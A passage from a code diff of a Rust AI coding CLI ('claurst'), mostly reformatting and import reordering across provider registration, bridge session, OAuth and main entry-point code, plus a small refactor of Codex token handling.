+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::nebius()));
         }
-        if std::env::var("NOVITA_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("NOVITA_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::novita()));
         }
-        if std::env::var("OVHCLOUD_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("OVHCLOUD_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::ovhcloud()));
         }
-        if std::env::var("SCALEWAY_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("SCALEWAY_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::scaleway()));
         }
-        if std::env::var("VULTR_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("VULTR_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::vultr_ai()));
         }
-        if std::env::var("BASETEN_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("BASETEN_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::baseten()));
         }
-        if std::env::var("FRIENDLI_TOKEN").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("FRIENDLI_TOKEN")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::friendli()));
         }
-        if std::env::var("UPSTAGE_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("UPSTAGE_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::upstage()));
         }
-        if std::env::var("STEPFUN_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("STEPFUN_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::stepfun()));
         }
-        if std::env::var("FIREWORKS_API_KEY").map(|v| !v.is_empty()).unwrap_or(false) {
+        if std::env::var("FIREWORKS_API_KEY")
+            .map(|v| !v.is_empty())
+            .unwrap_or(false)
+        {
             self.register(Arc::new(p::fireworks()));
         }
         self

--- a/src-rust/crates/api/src/stream_parser.rs
+++ b/src-rust/crates/api/src/stream_parser.rs
@@ -32,10 +32,7 @@ pub trait StreamParser: Send + Sync {
     async fn parse(
         &self,
         response: reqwest::Response,
-    ) -> Result<
-        Pin<Box<dyn Stream<Item = Result<StreamEvent, ProviderError>> + Send>>,
-        ProviderError,
-    >;
+    ) -> Result<Pin<Box<dyn Stream<Item = Result<StreamEvent, ProviderError>> + Send>>, ProviderError>;
 }
 
 // ---------------------------------------------------------------------------
@@ -64,10 +61,8 @@ impl StreamParser for SseStreamParser {
     async fn parse(
         &self,
         _response: reqwest::Response,
-    ) -> Result<
-        Pin<Box<dyn Stream<Item = Result<StreamEvent, ProviderError>> + Send>>,
-        ProviderError,
-    > {
+    ) -> Result<Pin<Box<dyn Stream<Item = Result<StreamEvent, ProviderError>> + Send>>, ProviderError>
+    {
         // Will be implemented in Phase 2A.
         Err(ProviderError::Other {
             provider: ProviderId::new("unknown"),
@@ -104,10 +99,8 @@ impl StreamParser for JsonLinesStreamParser {
     async fn parse(
         &self,
         _response: reqwest::Response,
-    ) -> Result<
-        Pin<Box<dyn Stream<Item = Result<StreamEvent, ProviderError>> + Send>>,
-        ProviderError,
-    > {
+    ) -> Result<Pin<Box<dyn Stream<Item = Result<StreamEvent, ProviderError>> + Send>>, ProviderError>
+    {
         // Will be implemented in Phase 2A.
         Err(ProviderError::Other {
             provider: ProviderId::new("unknown"),

--- a/src-rust/crates/api/src/transform.rs
+++ b/src-rust/crates/api/src/transform.rs
@@ -5,9 +5,9 @@
 // in both directions (outbound request serialisation and inbound response
 // deserialisation).
 
+use crate::provider::ModelInfo;
 use crate::provider_error::ProviderError;
 use crate::provider_types::{ProviderRequest, ProviderResponse};
-use crate::provider::ModelInfo;
 
 // ---------------------------------------------------------------------------
 // MessageTransformer

--- a/src-rust/crates/api/src/transformers/anthropic.rs
+++ b/src-rust/crates/api/src/transformers/anthropic.rs
@@ -8,9 +8,9 @@
 use crate::provider::ModelInfo;
 use crate::provider_error::ProviderError;
 use crate::provider_types::{ProviderRequest, ProviderResponse, StopReason};
+use crate::providers::message_normalization::normalize_anthropic_messages;
 use crate::transform::MessageTransformer;
 use crate::types::{ApiMessage, ApiToolDefinition};
-use crate::providers::message_normalization::normalize_anthropic_messages;
 use claurst_core::provider_id::ProviderId;
 use claurst_core::types::{ContentBlock, UsageInfo};
 
@@ -39,21 +39,17 @@ impl MessageTransformer for AnthropicTransformer {
         let normalized_messages = normalize_anthropic_messages(&request.messages);
         let api_messages: Vec<ApiMessage> =
             normalized_messages.iter().map(ApiMessage::from).collect();
-        let messages_json = serde_json::to_value(&api_messages).map_err(|e| {
-            ProviderError::Other {
+        let messages_json =
+            serde_json::to_value(&api_messages).map_err(|e| ProviderError::Other {
                 provider: ProviderId::new(ProviderId::ANTHROPIC),
                 message: format!("failed to serialise messages: {}", e),
                 status: None,
                 body: None,
-            }
-        })?;
+            })?;
 
         // Convert tools to API wire format.
-        let api_tools: Vec<ApiToolDefinition> = request
-            .tools
-            .iter()
-            .map(ApiToolDefinition::from)
-            .collect();
+        let api_tools: Vec<ApiToolDefinition> =
+            request.tools.iter().map(ApiToolDefinition::from).collect();
 
         let mut body = json!({
             "model": request.model,
@@ -77,14 +73,13 @@ impl MessageTransformer for AnthropicTransformer {
 
         // Tools.
         if !request.tools.is_empty() {
-            let tools_json = serde_json::to_value(&api_tools).map_err(|e| {
-                ProviderError::Other {
+            let tools_json =
+                serde_json::to_value(&api_tools).map_err(|e| ProviderError::Other {
                     provider: ProviderId::new(ProviderId::ANTHROPIC),
                     message: format!("failed to serialise tools: {}", e),
                     status: None,
                     body: None,
-                }
-            })?;
+                })?;
             body["tools"] = tools_json;
         }
 
@@ -213,7 +208,10 @@ impl MessageTransformer for AnthropicTransformer {
                         .and_then(|v| v.as_str())
                         .unwrap_or("")
                         .to_string();
-                    content.push(ContentBlock::Thinking { thinking, signature });
+                    content.push(ContentBlock::Thinking {
+                        thinking,
+                        signature,
+                    });
                 }
                 // redacted_thinking, citations, etc. — skip silently for now.
                 _ => {}

--- a/src-rust/crates/api/src/transformers/openai_chat.rs
+++ b/src-rust/crates/api/src/transformers/openai_chat.rs
@@ -31,8 +31,10 @@ impl MessageTransformer for OpenAiChatTransformer {
     ) -> Result<serde_json::Value, ProviderError> {
         use serde_json::json;
 
-        let messages =
-            OpenAiProvider::to_openai_messages_pub(&request.messages, request.system_prompt.as_ref());
+        let messages = OpenAiProvider::to_openai_messages_pub(
+            &request.messages,
+            request.system_prompt.as_ref(),
+        );
         let tools = OpenAiProvider::to_openai_tools_pub(&request.tools);
 
         let mut body = json!({

--- a/src-rust/crates/bridge/src/lib.rs
+++ b/src-rust/crates/bridge/src/lib.rs
@@ -94,7 +94,11 @@ impl JwtClaims {
         let exp = self.exp?;
         let now = chrono::Utc::now().timestamp();
         let diff = exp - now;
-        if diff > 0 { Some(diff) } else { None }
+        if diff > 0 {
+            Some(diff)
+        } else {
+            None
+        }
     }
 }
 
@@ -198,8 +202,8 @@ impl BridgeConfig {
         let mut config = Self::default();
 
         // URL override (sets enabled implicitly)
-        if let Ok(url) = std::env::var("CLAURST_BRIDGE_URL")
-            .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL"))
+        if let Ok(url) =
+            std::env::var("CLAURST_BRIDGE_URL").or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL"))
         {
             if !url.is_empty() {
                 config.server_url = url;
@@ -361,9 +365,7 @@ pub enum BridgeEvent {
         code: Option<String>,
     },
     /// Response to a `Ping` message.
-    Pong {
-        server_time: Option<u64>,
-    },
+    Pong { server_time: Option<u64> },
     /// Session lifecycle state change.
     SessionState {
         session_id: String,
@@ -407,10 +409,7 @@ impl BridgeSession {
         let session_id = uuid::Uuid::new_v4().to_string();
         let http = reqwest::Client::builder()
             .timeout(std::time::Duration::from_secs(30))
-            .user_agent(format!(
-                "claude-code-rust/{}",
-                env!("CARGO_PKG_VERSION")
-            ))
+            .user_agent(format!("claude-code-rust/{}", env!("CARGO_PKG_VERSION")))
             .build()
             .expect("Failed to build reqwest client");
 
@@ -451,10 +450,7 @@ impl BridgeSession {
             .as_deref()
             .ok_or_else(|| anyhow::anyhow!("Bridge register: no session token"))?;
 
-        let url = format!(
-            "{}/api/claude_code/sessions",
-            self.config.server_url
-        );
+        let url = format!("{}/api/claude_code/sessions", self.config.server_url);
 
         let body = serde_json::json!({
             "session_id": self.session_id,
@@ -508,13 +504,7 @@ impl BridgeSession {
 
         debug!(session_id = %self.session_id, "Deregistering bridge session");
 
-        match self
-            .http
-            .delete(&url)
-            .bearer_auth(token)
-            .send()
-            .await
-        {
+        match self.http.delete(&url).bearer_auth(token).send().await {
             Ok(r) if r.status().is_success() => {
                 info!(session_id = %self.session_id, "Bridge session deregistered");
             }
@@ -663,9 +653,8 @@ impl BridgeSession {
     ) {
         info!(session_id = %self.session_id, "Bridge poll loop started");
 
-        let base_interval = std::time::Duration::from_millis(
-            self.config.polling_interval_ms.max(500),
-        );
+        let base_interval =
+            std::time::Duration::from_millis(self.config.polling_interval_ms.max(500));
         let max_backoff = std::time::Duration::from_secs(60);
 
         loop {
@@ -841,7 +830,8 @@ async fn start_bridge_with_client(
     String,
 )> {
     if !config.is_active() {
-        anyhow::bail!("start_bridge: bridge is not active (enabled={}, token={})",
+        anyhow::bail!(
+            "start_bridge: bridge is not active (enabled={}, token={})",
             config.enabled,
             config.session_token.is_some()
         );
@@ -886,7 +876,11 @@ pub struct BridgeSessionInfo {
 
 impl std::fmt::Display for BridgeSessionInfo {
     fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
-        write!(f, "BridgeSessionInfo {{ session_id: {}, session_url: {} }}", self.session_id, self.session_url)
+        write!(
+            f,
+            "BridgeSessionInfo {{ session_id: {}, session_url: {} }}",
+            self.session_id, self.session_url
+        )
     }
 }
 
@@ -1019,7 +1013,11 @@ pub async fn start_bridge_session(
             anyhow::bail!(
                 "Bridge session registration failed: server returned HTTP {}. {}",
                 status,
-                if body_text.is_empty() { String::new() } else { format!("Response: {}", &body_text[..body_text.len().min(200)]) }
+                if body_text.is_empty() {
+                    String::new()
+                } else {
+                    format!("Response: {}", &body_text[..body_text.len().min(200)])
+                }
             );
         }
     }
@@ -1086,7 +1084,10 @@ pub async fn poll_bridge_messages(
         let status = resp.status().as_u16();
         match status {
             200 => {
-                let text = resp.text().await.context("poll_bridge_messages: reading body")?;
+                let text = resp
+                    .text()
+                    .await
+                    .context("poll_bridge_messages: reading body")?;
                 if text.trim().is_empty() || text.trim() == "[]" {
                     return Ok(vec![]);
                 }
@@ -1098,10 +1099,16 @@ pub async fn poll_bridge_messages(
             429 => {
                 attempt += 1;
                 if attempt > max_retries {
-                    anyhow::bail!("poll_bridge_messages: rate-limited (HTTP 429) after {} retries", max_retries);
+                    anyhow::bail!(
+                        "poll_bridge_messages: rate-limited (HTTP 429) after {} retries",
+                        max_retries
+                    );
                 }
                 let backoff = std::time::Duration::from_millis(1_000 * 2u64.pow(attempt - 1));
-                warn!(attempt, "Bridge poll rate-limited; backing off {:?}", backoff);
+                warn!(
+                    attempt,
+                    "Bridge poll rate-limited; backing off {:?}", backoff
+                );
                 tokio::time::sleep(backoff).await;
                 continue;
             }
@@ -1186,10 +1193,7 @@ pub async fn post_bridge_response(
 ///
 /// Errors are returned to the caller, who should treat them as transient and
 /// ignore them so the query loop is never blocked.
-pub async fn post_bridge_event(
-    info: &BridgeSessionInfo,
-    payload: String,
-) -> anyhow::Result<()> {
+pub async fn post_bridge_event(info: &BridgeSessionInfo, payload: String) -> anyhow::Result<()> {
     let server_url = std::env::var("CLAURST_BRIDGE_URL")
         .or_else(|_| std::env::var("CLAUDE_BRIDGE_BASE_URL"))
         .unwrap_or_else(|_| "https://claude.ai".to_string());
@@ -1232,10 +1236,7 @@ pub async fn post_bridge_event(
         debug!(session_id = %info.session_id, "Bridge event posted");
         Ok(())
     } else {
-        anyhow::bail!(
-            "post_bridge_event: server returned HTTP {}",
-            status
-        )
+        anyhow::bail!("post_bridge_event: server returned HTTP {}", status)
     }
 }
 
@@ -1377,10 +1378,7 @@ pub async fn run_bridge_loop(
                 let msg = e.to_string();
                 if msg.contains("auth error") || msg.contains("401") || msg.contains("403") {
                     let _ = tui_tx
-                        .send(TuiBridgeEvent::Error(format!(
-                            "Bridge auth failed: {}",
-                            e
-                        )))
+                        .send(TuiBridgeEvent::Error(format!("Bridge auth failed: {}", e)))
                         .await;
                     return Err(e);
                 }
@@ -1436,7 +1434,9 @@ pub async fn run_bridge_loop(
     // Spawn the low-level poll loop in its own task.
     let poll_cancel = cancel.clone();
     tokio::spawn(async move {
-        session.run_poll_loop(msg_tx, bridge_ev_rx, poll_cancel).await;
+        session
+            .run_poll_loop(msg_tx, bridge_ev_rx, poll_cancel)
+            .await;
     });
 
     // Message ID counter for outbound text deltas.
@@ -1706,7 +1706,9 @@ mod tests {
 
     #[test]
     fn test_bridge_event_pong_serde() {
-        let ev = BridgeEvent::Pong { server_time: Some(1_700_000_000) };
+        let ev = BridgeEvent::Pong {
+            server_time: Some(1_700_000_000),
+        };
         let j = serde_json::to_string(&ev).unwrap();
         assert!(j.contains(r#""type":"pong""#));
     }

--- a/src-rust/crates/cli/src/codex_oauth_flow.rs
+++ b/src-rust/crates/cli/src/codex_oauth_flow.rs
@@ -7,11 +7,14 @@
 
 use anyhow::{anyhow, bail};
 use base64::{engine::general_purpose::URL_SAFE_NO_PAD, Engine as _};
+use claurst_core::codex_oauth::{
+    CODEX_AUTHORIZE_URL, CODEX_CLIENT_ID, CODEX_OAUTH_PORT, CODEX_REDIRECT_URI, CODEX_SCOPES,
+    CODEX_TOKEN_URL,
+};
+use claurst_core::oauth_config::CodexTokens;
 use sha2::{Digest, Sha256};
 use tokio::io::{AsyncBufReadExt, BufReader};
 use tokio::net::TcpListener;
-use claurst_core::oauth_config::CodexTokens;
-use claurst_core::codex_oauth::{CODEX_CLIENT_ID, CODEX_AUTHORIZE_URL, CODEX_OAUTH_PORT, CODEX_REDIRECT_URI, CODEX_SCOPES, CODEX_TOKEN_URL};
 
 /// Generate a PKCE code verifier (random 64-byte base64url string).
 pub fn generate_code_verifier() -> String {
@@ -37,7 +40,8 @@ pub fn compute_code_challenge(verifier: &str) -> String {
 /// Generate a random OAuth state parameter.
 pub fn generate_state() -> String {
     let bytes = uuid::Uuid::new_v4();
-    URL_SAFE_NO_PAD.encode(bytes.as_bytes())
+    URL_SAFE_NO_PAD
+        .encode(bytes.as_bytes())
         .chars()
         .take(32)
         .collect()
@@ -115,7 +119,9 @@ async fn wait_for_callback(listener: TcpListener) -> anyhow::Result<(String, Str
     }
 
     let path = parts[1];
-    let query_start = path.find('?').ok_or_else(|| anyhow!("No query string in callback"))?;
+    let query_start = path
+        .find('?')
+        .ok_or_else(|| anyhow!("No query string in callback"))?;
     let query = &path[query_start + 1..];
 
     let mut code = String::new();
@@ -194,37 +200,25 @@ async fn exchange_code_for_tokens(code: &str, verifier: &str) -> anyhow::Result<
         .await
         .map_err(|e| anyhow!("Failed to parse token response: {}", e))?;
 
-    let access_token = body["access_token"]
-        .as_str()
-        .unwrap_or("")
-        .to_string();
+    let access_token = body["access_token"].as_str().unwrap_or("").to_string();
 
     if access_token.is_empty() {
         bail!("No access_token in response");
     }
 
     let refresh_token = body["refresh_token"].as_str().map(|s| s.to_string());
-    let account_id = extract_account_id_from_jwt(&access_token);
+    let expires_at = claurst_core::codex_oauth::expires_at_from_now(body["expires_in"].as_u64());
+    let account_id = body["id_token"]
+        .as_str()
+        .and_then(claurst_core::codex_oauth::extract_account_id_from_jwt)
+        .or_else(|| claurst_core::codex_oauth::extract_account_id_from_jwt(&access_token));
 
     Ok(CodexTokens {
         access_token,
         refresh_token,
         account_id,
-        expires_at: None,
+        expires_at,
     })
-}
-
-/// Extract chatgpt-account-id from the JWT access token.
-/// The account_id is in the middle segment (payload) under
-/// https://api.openai.com/auth.account_id
-fn extract_account_id_from_jwt(token: &str) -> Option<String> {
-    let parts: Vec<&str> = token.splitn(3, '.').collect();
-    let payload_b64 = parts.get(1)?;
-    let payload = URL_SAFE_NO_PAD.decode(payload_b64).ok()?;
-    let json: serde_json::Value = serde_json::from_slice(&payload).ok()?;
-    json["https://api.openai.com/auth"]["account_id"]
-        .as_str()
-        .map(|s| s.to_string())
 }
 
 #[cfg(test)]
@@ -235,7 +229,9 @@ mod tests {
     fn test_generate_code_verifier_format() {
         let verifier = generate_code_verifier();
         // Base64url encoding: [A-Za-z0-9_-]
-        assert!(verifier.chars().all(|c| c.is_alphanumeric() || c == '_' || c == '-'));
+        assert!(verifier
+            .chars()
+            .all(|c| c.is_alphanumeric() || c == '_' || c == '-'));
         assert!(!verifier.is_empty());
     }
 
@@ -246,14 +242,18 @@ mod tests {
         let challenge2 = compute_code_challenge(verifier);
         assert_eq!(challenge1, challenge2);
         // Base64url format
-        assert!(challenge1.chars().all(|c| c.is_alphanumeric() || c == '_' || c == '-'));
+        assert!(challenge1
+            .chars()
+            .all(|c| c.is_alphanumeric() || c == '_' || c == '-'));
     }
 
     #[test]
     fn test_generate_state_format() {
         let state = generate_state();
         assert!(!state.is_empty());
-        assert!(state.chars().all(|c| c.is_alphanumeric() || c == '_' || c == '-'));
+        assert!(state
+            .chars()
+            .all(|c| c.is_alphanumeric() || c == '_' || c == '-'));
     }
 
     #[test]
@@ -273,7 +273,7 @@ mod tests {
         // For testing we'd need to create a valid JWT structure, which is complex
         // In practice, this function is tested via integration tests
         let invalid_token = "not.a.jwt";
-        let result = extract_account_id_from_jwt(invalid_token);
+        let result = claurst_core::codex_oauth::extract_account_id_from_jwt(invalid_token);
         // Invalid JWT should return None
         assert!(result.is_none() || result.unwrap().is_empty());
     }

--- a/src-rust/crates/cli/src/main.rs
+++ b/src-rust/crates/cli/src/main.rs
@@ -8,8 +8,8 @@
 //    - Headless (--print / -p) mode: single query, output to stdout
 //    - Interactive REPL mode: full TUI with ratatui
 
-mod oauth_flow;
 mod codex_oauth_flow;
+mod oauth_flow;
 
 // ---------------------------------------------------------------------------
 // Build-time metadata (embedded via build.rs)
@@ -31,6 +31,9 @@ pub const FEEDBACK_CHANNEL: &str = env!("FEEDBACK_CHANNEL");
 pub const ISSUES_EXPLAINER: &str = env!("ISSUES_EXPLAINER");
 
 use anyhow::Context;
+use async_trait::async_trait;
+use clap::{ArgAction, Parser, ValueEnum};
+use claurst_core::types::ToolDefinition;
 use claurst_core::{
     config::{Config, PermissionMode, Settings},
     constants::APP_VERSION,
@@ -38,10 +41,7 @@ use claurst_core::{
     cost::CostTracker,
     permissions::{AutoPermissionHandler, InteractivePermissionHandler},
 };
-use async_trait::async_trait;
-use claurst_core::types::ToolDefinition;
 use claurst_tools::{PermissionLevel, Tool, ToolContext, ToolResult};
-use clap::{ArgAction, Parser, ValueEnum};
 use parking_lot::Mutex as ParkingMutex;
 use std::{path::PathBuf, sync::Arc};
 use tracing::{debug, info, warn};
@@ -361,7 +361,8 @@ async fn main() -> anyhow::Result<()> {
         let mut entries = registry.list_all();
         // Sort by provider then model id for stable output.
         entries.sort_by(|a, b| {
-            (&*a.info.provider_id).cmp(&*b.info.provider_id)
+            (&*a.info.provider_id)
+                .cmp(&*b.info.provider_id)
                 .then_with(|| (&*a.info.id).cmp(&*b.info.id))
         });
         for entry in entries {
@@ -383,7 +384,8 @@ async fn main() -> anyhow::Result<()> {
     if let Some(cmd_name) = raw_args.get(1).map(|s| s.as_str()) {
         // Only intercept if it looks like a subcommand (no leading `-` or `/`)
         if !cmd_name.starts_with('-') && !cmd_name.starts_with('/') {
-            if let Some(named_cmd) = claurst_commands::named_commands::find_named_command(cmd_name) {
+            if let Some(named_cmd) = claurst_commands::named_commands::find_named_command(cmd_name)
+            {
                 // Build a minimal CommandContext (named commands are pre-session)
                 let settings = Settings::load().await.unwrap_or_default();
                 let config = settings.effective_config();
@@ -427,8 +429,7 @@ async fn main() -> anyhow::Result<()> {
     let log_level = if cli.verbose { "debug" } else { "warn" };
     tracing_subscriber::fmt()
         .with_env_filter(
-            EnvFilter::try_from_default_env()
-                .unwrap_or_else(|_| EnvFilter::new(log_level)),
+            EnvFilter::try_from_default_env().unwrap_or_else(|_| EnvFilter::new(log_level)),
         )
         .with_target(false)
         .without_time()
@@ -487,7 +488,10 @@ async fn main() -> anyhow::Result<()> {
     }
     if let Some(base) = &cli.api_base {
         // Store in the provider's config entry
-        let provider_id = config.provider.clone().unwrap_or_else(|| "anthropic".to_string());
+        let provider_id = config
+            .provider
+            .clone()
+            .unwrap_or_else(|| "anthropic".to_string());
         config
             .provider_configs
             .entry(provider_id)
@@ -497,8 +501,7 @@ async fn main() -> anyhow::Result<()> {
 
     // --dump-system-prompt fast path
     if cli.dump_system_prompt {
-        let ctx = ContextBuilder::new(cwd.clone())
-            .disable_claude_mds(config.disable_claude_mds);
+        let ctx = ContextBuilder::new(cwd.clone()).disable_claude_mds(config.disable_claude_mds);
         let sys = ctx.build_system_context().await;
         let user = ctx.build_user_context().await;
         println!("{}\n\n{}", sys, user);
@@ -506,8 +509,8 @@ async fn main() -> anyhow::Result<()> {
     }
 
     // Build context
-    let ctx_builder = ContextBuilder::new(cwd.clone())
-        .disable_claude_mds(config.disable_claude_mds);
+    let ctx_builder =
+        ContextBuilder::new(cwd.clone()).disable_claude_mds(config.disable_claude_mds);
     let system_ctx = ctx_builder.build_system_context().await;
     let user_ctx = ctx_builder.build_user_context().await;
 
@@ -537,8 +540,7 @@ async fn main() -> anyhow::Result<()> {
     // explicitly the intended provider and no key exists at all.
     let other_provider_configured = {
         let active_provider = config.provider.as_deref().unwrap_or("anthropic");
-        let has_non_anthropic_env =
-            std::env::var("OPENAI_API_KEY").is_ok()
+        let has_non_anthropic_env = std::env::var("OPENAI_API_KEY").is_ok()
             || std::env::var("GOOGLE_API_KEY").is_ok()
             || std::env::var("GOOGLE_GENERATIVE_AI_API_KEY").is_ok()
             || std::env::var("GROQ_API_KEY").is_ok()
@@ -564,7 +566,9 @@ async fn main() -> anyhow::Result<()> {
 
     let (api_key, use_bearer_auth) = match config.resolve_auth_async().await {
         Some(auth) => auth,
-        None if other_provider_configured && config.provider.as_deref().unwrap_or("anthropic") != "anthropic" => {
+        None if other_provider_configured
+            && config.provider.as_deref().unwrap_or("anthropic") != "anthropic" =>
+        {
             // Non-Anthropic provider selected — no Anthropic key needed.
             (String::new(), false)
         }
@@ -593,6 +597,11 @@ async fn main() -> anyhow::Result<()> {
         api_key: api_key.clone(),
         api_base: config.resolve_api_base(),
         use_bearer_auth,
+        provider: if config.provider.as_deref() == Some("openai-codex") {
+            claurst_api::client::Provider::Codex
+        } else {
+            claurst_api::client::Provider::Anthropic
+        },
         ..Default::default()
     };
     let client = Arc::new(
@@ -690,11 +699,8 @@ async fn main() -> anyhow::Result<()> {
 
         // Register plugin MCP servers into the in-memory config so they are
         // picked up by any subsequent MCP manager construction.
-        let existing_names: std::collections::HashSet<String> = config
-            .mcp_servers
-            .iter()
-            .map(|s| s.name.clone())
-            .collect();
+        let existing_names: std::collections::HashSet<String> =
+            config.mcp_servers.iter().map(|s| s.name.clone()).collect();
         for mcp_server in plugin_registry.all_mcp_servers() {
             if !existing_names.contains(&mcp_server.name) {
                 config.mcp_servers.push(mcp_server);
@@ -708,7 +714,8 @@ async fn main() -> anyhow::Result<()> {
     let model_registry = load_cached_model_registry();
 
     // Build query config
-    let mut query_config = claurst_query::QueryConfig::from_config_with_registry(&config, &model_registry);
+    let mut query_config =
+        claurst_query::QueryConfig::from_config_with_registry(&config, &model_registry);
     query_config.model_registry = Some(model_registry.clone());
     query_config.max_turns = cli.max_turns;
     query_config.system_prompt = Some(system_prompt);
@@ -721,7 +728,10 @@ async fn main() -> anyhow::Result<()> {
         if let Some(level) = claurst_core::effort::EffortLevel::from_str(level_str) {
             query_config.effort_level = Some(level);
         } else {
-            eprintln!("Warning: unknown effort level '{}' — expected low/medium/high/max", level_str);
+            eprintln!(
+                "Warning: unknown effort level '{}' — expected low/medium/high/max",
+                level_str
+            );
         }
     }
     if let Some(usd) = cli.max_budget_usd {
@@ -749,7 +759,10 @@ async fn main() -> anyhow::Result<()> {
             }
             filter_tools_for_agent(tools, &access)
         } else {
-            eprintln!("Warning: unknown agent '{}'. Run /agent to see available agents.", agent_name);
+            eprintln!(
+                "Warning: unknown agent '{}'. Run /agent to see available agents.",
+                agent_name
+            );
             tools
         }
     } else {
@@ -769,18 +782,10 @@ async fn main() -> anyhow::Result<()> {
 
     // --print mode (headless)
     let result = if is_headless {
-        run_headless(
-            &cli,
-            client,
-            tools,
-            tool_ctx,
-            query_config,
-            cost_tracker,
-        )
-        .await
+        run_headless(&cli, client, tools, tool_ctx, query_config, cost_tracker).await
     } else {
-        let has_credentials = !api_key.is_empty()
-            || config.provider.as_deref().is_some_and(|p| p != "anthropic");
+        let has_credentials =
+            !api_key.is_empty() || config.provider.as_deref().is_some_and(|p| p != "anthropic");
         run_interactive(
             config,
             settings,
@@ -801,14 +806,15 @@ async fn main() -> anyhow::Result<()> {
     result
 }
 
-async fn connect_mcp_manager_arc(
-    config: &Config,
-) -> Option<Arc<claurst_mcp::McpManager>> {
+async fn connect_mcp_manager_arc(config: &Config) -> Option<Arc<claurst_mcp::McpManager>> {
     if config.mcp_servers.is_empty() {
         return None;
     }
 
-    info!(count = config.mcp_servers.len(), "Connecting to MCP servers");
+    info!(
+        count = config.mcp_servers.len(),
+        "Connecting to MCP servers"
+    );
     let mcp_manager = claurst_mcp::McpManager::connect_all(&config.mcp_servers).await;
     Some(Arc::new(mcp_manager))
 }
@@ -950,9 +956,8 @@ async fn refresh_provider_runtime_state(
         claurst_api::AnthropicClient::new(client_config.clone())
             .context("Failed to rebuild Anthropic client")?,
     );
-    let provider_registry = Arc::new(
-        claurst_api::ProviderRegistry::from_environment_with_auth_store(client_config),
-    );
+    let provider_registry =
+        Arc::new(claurst_api::ProviderRegistry::from_environment_with_auth_store(client_config));
     let model_registry = load_cached_model_registry();
 
     spawn_models_cache_refresh();
@@ -1025,72 +1030,78 @@ async fn run_headless(
     // --input-format stream-json: stdin is newline-delimited JSON, each line is
     //   {"role":"user"|"assistant","content":"..."} (mirrors TS --input-format stream-json).
     // --input-format text (default): read prompt from positional arg or entire stdin as text.
-    let mut messages: Vec<claurst_core::types::Message> = if cli.input_format == CliInputFormat::StreamJson {
-        use tokio::io::{self, AsyncBufReadExt, BufReader};
-        let stdin = io::stdin();
-        let mut reader = BufReader::new(stdin);
-        let mut line = String::new();
-        let mut parsed: Vec<claurst_core::types::Message> = Vec::new();
-        loop {
-            line.clear();
-            let n = reader.read_line(&mut line).await?;
-            if n == 0 {
-                break;
-            }
-            let trimmed = line.trim();
-            if trimmed.is_empty() {
-                continue;
-            }
-            match serde_json::from_str::<serde_json::Value>(trimmed) {
-                Ok(v) => {
-                    let role = v.get("role").and_then(|r| r.as_str()).unwrap_or("user");
-                    let content = v
-                        .get("content")
-                        .and_then(|c| c.as_str())
-                        .unwrap_or("")
-                        .to_string();
-                    if role == "assistant" {
-                        parsed.push(claurst_core::types::Message::assistant(content));
-                    } else {
-                        parsed.push(claurst_core::types::Message::user(content));
+    let mut messages: Vec<claurst_core::types::Message> =
+        if cli.input_format == CliInputFormat::StreamJson {
+            use tokio::io::{self, AsyncBufReadExt, BufReader};
+            let stdin = io::stdin();
+            let mut reader = BufReader::new(stdin);
+            let mut line = String::new();
+            let mut parsed: Vec<claurst_core::types::Message> = Vec::new();
+            loop {
+                line.clear();
+                let n = reader.read_line(&mut line).await?;
+                if n == 0 {
+                    break;
+                }
+                let trimmed = line.trim();
+                if trimmed.is_empty() {
+                    continue;
+                }
+                match serde_json::from_str::<serde_json::Value>(trimmed) {
+                    Ok(v) => {
+                        let role = v.get("role").and_then(|r| r.as_str()).unwrap_or("user");
+                        let content = v
+                            .get("content")
+                            .and_then(|c| c.as_str())
+                            .unwrap_or("")
+                            .to_string();
+                        if role == "assistant" {
+                            parsed.push(claurst_core::types::Message::assistant(content));
+                        } else {
+                            parsed.push(claurst_core::types::Message::user(content));
+                        }
+                    }
+                    Err(e) => {
+                        eprintln!(
+                            "Warning: skipping malformed JSON line: {} ({:?})",
+                            trimmed, e
+                        );
                     }
                 }
-                Err(e) => {
-                    eprintln!("Warning: skipping malformed JSON line: {} ({:?})", trimmed, e);
+            }
+            if parsed.is_empty() {
+                // Also check positional arg as fallback
+                if let Some(ref p) = cli.prompt {
+                    parsed.push(claurst_core::types::Message::user(p.clone()));
                 }
             }
-        }
-        if parsed.is_empty() {
-            // Also check positional arg as fallback
-            if let Some(ref p) = cli.prompt {
-                parsed.push(claurst_core::types::Message::user(p.clone()));
-            }
-        }
-        parsed
-    } else {
-        // Plain text mode
-        let prompt = if let Some(ref p) = cli.prompt {
-            p.clone()
+            parsed
         } else {
-            use tokio::io::{self, AsyncReadExt};
-            let mut stdin = io::stdin();
-            let mut buf = String::new();
-            stdin.read_to_string(&mut buf).await?;
-            buf.trim().to_string()
+            // Plain text mode
+            let prompt = if let Some(ref p) = cli.prompt {
+                p.clone()
+            } else {
+                use tokio::io::{self, AsyncReadExt};
+                let mut stdin = io::stdin();
+                let mut buf = String::new();
+                stdin.read_to_string(&mut buf).await?;
